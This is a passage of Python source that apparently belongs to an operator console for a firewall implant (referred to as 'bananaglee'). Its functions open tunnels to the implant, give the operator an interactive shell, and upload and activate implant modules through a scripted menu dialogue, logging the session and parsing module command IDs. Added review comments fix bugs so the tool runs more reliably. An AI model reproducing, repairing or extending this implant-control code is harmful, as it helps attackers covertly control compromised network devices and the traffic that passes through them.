            log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))
            found_file = True
    # file() is the Python-2 builtin; the session is teed into the log.
    logfile = file(log_file, 'a')
    child.logfile = logfile
    # Hand the terminal directly to the LP process until the user detaches.
    # NOTE(review): the tunnel and log file are only closed on the exception
    # path — if interact() returns normally, both are leaked.
    try:
        child.interact()
    except:
        self.logger.debug('user left shell')
        tools.closeTunnel(self.sfile, tunnel_number, self.logger)
        logfile.close()
        return
|
def do_load(self, module):
    """load [module]
    uploads and activates a module"""
    self.logger.debug('user ran load ' + str(module))
    if module in self.sfile['mod_num_dict']:
        module_number = self.sfile['mod_num_dict'][module]
    else:
        self.logger.error('selected an invalid module, the valid modules are:')
        self.do_show_uploadable_modules(' ')
        # BUG FIX: the original fell through here and later crashed with a
        # NameError on the undefined module_number; bail out instead.
        return
    if module in self.sfile['uploaded_mod_list']:
        self.logger.info('the module ' + str(module) + ' is already uploaded')
        return
    if self.sfile['survey'] == False:
        self.logger.error('survey had not been completed, please run survey')
        return
    tunnel_number = tools.openTunnel(self.sfile, self.logger)
    command = (str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + self.sfile['logs_to_process'])
    child = pexpect.spawn(command)
    # Pick the first <host>.<target>BG_upload_module<N>.log not yet taken.
    temp_counter = 0
    while True:
        log_file = os.path.join(self.sfile['log_dir'], self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_upload_module' + str(temp_counter) + '.log')
        if not os.path.isfile(log_file):
            break
        temp_counter += 1
    # BUG FIX: file() is a Python-2-only builtin; open() is portable.
    logfile = open(log_file, 'a')
    child.logfile = logfile
    # Menu dialogue: '31' + module number uploads the module, '32 <id>'
    # activates it, '36' lists modules, then back out (9) and quit (0).
    try:
        child.sendline('1')
        child.expect('BG#', timeout=120)
        child.sendline('31')
        child.expect('# Select module', timeout=120)
        child.sendline(str(module_number))
        self.logger.debug('uploading ' + str(module) + ' with ID of: ' + str(module_number))
        child.expect('BG#', timeout=300)
        id_num = self.tools_config.get('bananaglee' + self.sfile['version'], str(module) + '_ID')
        child.sendline('32 ' + str(id_num))
        self.logger.debug('activating the module with 32 ' + str(id_num))
        child.expect('BG#', timeout=120)
        child.sendline('36')
        child.expect('BG#', timeout=120)
        child.sendline('9')
        child.expect('BG#', timeout=120)
        child.sendline('0')
    except:
        self.logger.exception('could not load the module : ' + str(module))
    # BUG FIX: the original only closed the log inside the try block, so a
    # failed dialogue leaked the handle; close it on both paths.
    logfile.close()
    tools.closeTunnel(self.sfile, tunnel_number, self.logger)
    # Scrape the session log for 'Command' lines, which map each module
    # command name (quoted) to its implant-side numeric ID (last 6 chars).
    with open(log_file, 'r') as f:
        output = f.readlines()
    insert_dict = {}
    for i in output:
        if 'Command' in i:
            self.logger.info(i.rstrip('\r\n'))
            command_id = i[-6:].rstrip('\r\n')
            command = i.split("'")[1]
            insert_dict[command] = str(command_id)
    self.sfile[module] = insert_dict
    self.uploaded_mod_list.append(module)
    self.sfile['uploaded_mod_list'] = self.uploaded_mod_list
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.